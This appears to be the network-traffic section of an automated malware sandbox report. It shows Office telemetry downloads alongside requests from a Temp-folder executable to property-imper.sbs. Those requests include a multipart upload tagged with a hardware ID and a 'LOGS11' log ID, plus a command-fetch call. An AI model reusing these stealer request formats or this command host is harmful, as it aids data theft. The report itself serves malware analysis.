2024-11-22 19:36:55 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49914	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:54 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:55 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:55 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193655Z-178bfbc474bfw4gbhC1NYCunf400000003b000000000r20d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-22 19:36:55 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49915	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:55 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:55 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:55 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: b5bbaf22-a01e-0070-528a-3b573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193655Z-174c587ffdfx984chC1TEB676g00000001tg00000000n606 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:55 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49916	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:55 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:55 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:55 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: efd631bc-c01e-008d-6f47-3c2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193655Z-15b8b599d88g5tp8hC1TEByx6w00000001xg0000000047wt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:55 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49917	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:55 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:55 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:55 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193655Z-15b8b599d88pxmdghC1TEBux9c000000021g000000007564 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:55 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49921	172.67.162.84	443	7288	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:56 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PQUGJIC8QO17H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8760 Host: property-imper.sbs
2024-11-22 19:36:56 UTC	8760	OUT	Data Raw: 2d 2d 50 51 55 47 4a 49 43 38 51 4f 31 37 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 51 55 47 4a 49 43 38 51 4f 31 37 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 51 55 47 4a 49 43 38 51 4f 31 37 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 51 55 47 4a Data Ascii: --PQUGJIC8QO17HContent-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--PQUGJIC8QO17HContent-Disposition: form-data; name="pid"2--PQUGJIC8QO17HContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PQUGJ
2024-11-22 19:36:58 UTC	1019	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=de9mln989rd5rj4p8nluocmb7f; expires=Tue, 18-Mar-2025 13:23:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IkoyW03JwAQFw%2BIK9Qo%2BxQQQmKsDNeN6QqWGyOs4xJKP6ls6PxXQwjt3NNcbE1LTs5yqDcRnKWCbTVzQPwCSSS%2BzqYliU4FdVDbEVNfI9CQJ1VMIoBByAyuqG9y8tj%2F9pjquvU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5f0d09f242dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=26639&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9696&delivery_rate=1657207&cwnd=186&unsent_bytes=0&cid=0cabbbee82d894a0&ts=1812&x=0"
2024-11-22 19:36:58 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49919	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:57 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:57 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:57 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 8c2dcc7a-801e-0035-158c-3b752a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193657Z-174c587ffdfgcs66hC1TEB69cs00000001n000000000u03f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:57 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49918	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:57 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:57 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:57 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193657Z-178bfbc474bwlrhlhC1NYCy3kg00000003c000000000kaqc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:57 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49920	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:57 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:57 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:57 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193657Z-174c587ffdf89smkhC1TEB697s00000001z000000000ba8t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:57 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49922	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:57 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:58 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:58 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 24867866-a01e-0053-1264-3b8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193658Z-178bfbc474bbcwv4hC1NYCypys00000003b0000000004924 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:58 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49928	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:57 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: property-imper.sbs
2024-11-22 19:36:57 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=CF00C40204369BA1D7CBBD6DF28D3732
2024-11-22 19:36:58 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tn32h6bbibf72n7ufu61bgqkku; expires=Tue, 18-Mar-2025 13:23:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxAEeiPT9q6EwCgOoYUQDludiSXvVvEdRiyHL7sm%2FZKtDWytMyOGsy%2BDjuCqrFsGXwaOlwjYzMU3FQFISRu%2FBfiqo9M0CLi0R36H3sg1GxwH4GyM1zFVaO7opLV411Okf1c%2Bhjw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5f1358bf0f4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=990&delivery_rate=1716637&cwnd=251&unsent_bytes=0&cid=0c286d87c56ec6da&ts=742&x=0"
2024-11-22 19:36:58 UTC	295	IN	Data Raw: 31 32 30 0d 0a 52 36 67 2b 32 4a 79 2f 70 46 41 54 67 69 6a 33 54 4c 74 31 51 4a 55 2b 65 6b 38 38 63 55 4f 33 66 73 45 55 53 50 68 5a 79 56 77 63 30 78 79 74 76 6f 57 47 4f 47 66 32 57 4d 30 51 6c 43 6c 76 70 41 5a 50 59 51 35 41 64 70 6c 50 38 43 64 6d 79 57 2b 56 63 79 6a 4f 57 49 53 7a 32 38 45 32 50 65 64 51 6b 6d 36 58 56 79 62 68 48 45 42 2f 45 46 4d 6d 6c 55 54 77 61 57 53 44 65 37 78 2b 66 59 70 57 72 4f 6a 50 6e 67 77 38 33 67 66 47 64 49 35 62 63 71 51 4c 56 48 34 4e 51 6d 32 47 53 4a 30 37 4f 34 77 38 71 44 45 62 68 30 79 35 38 74 76 4c 50 54 33 6e 55 4a 4a 75 6c 31 63 6d 34 52 78 41 66 78 42 54 4a 70 56 45 38 57 6c 6b 67 33 75 38 66 6e 32 4b 56 71 7a 6f 7a 35 34 4d 50 4e 34 48 78 48 32 56 51 58 47 37 44 45 35 37 45 6b 42 79 36 31 47 6e 66 53 Data Ascii: 120R6g+2Jy/pFATgij3TLt1QJU+ek88cUO3fsEUSPhZyVwc0xytvoWGOGf2WM0QlClvpAZPYQ5AdplP8CdmyW+VcyjOWISz28E2PedQkm6XVybhHEB/EFMmlUTwaWSDe7x+fYpWrOjPngw83gfGdI5bcqQLVH4NQm2GSJ07O4w8qDEbh0y58tvLPT3nUJJul1cm4RxAfxBTJpVE8Wlkg3u8fn2KVqzoz54MPN4HxH2VQXG7DE57EkBy61GnfS
2024-11-22 19:36:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:34:57
Start date:	22/11/2024
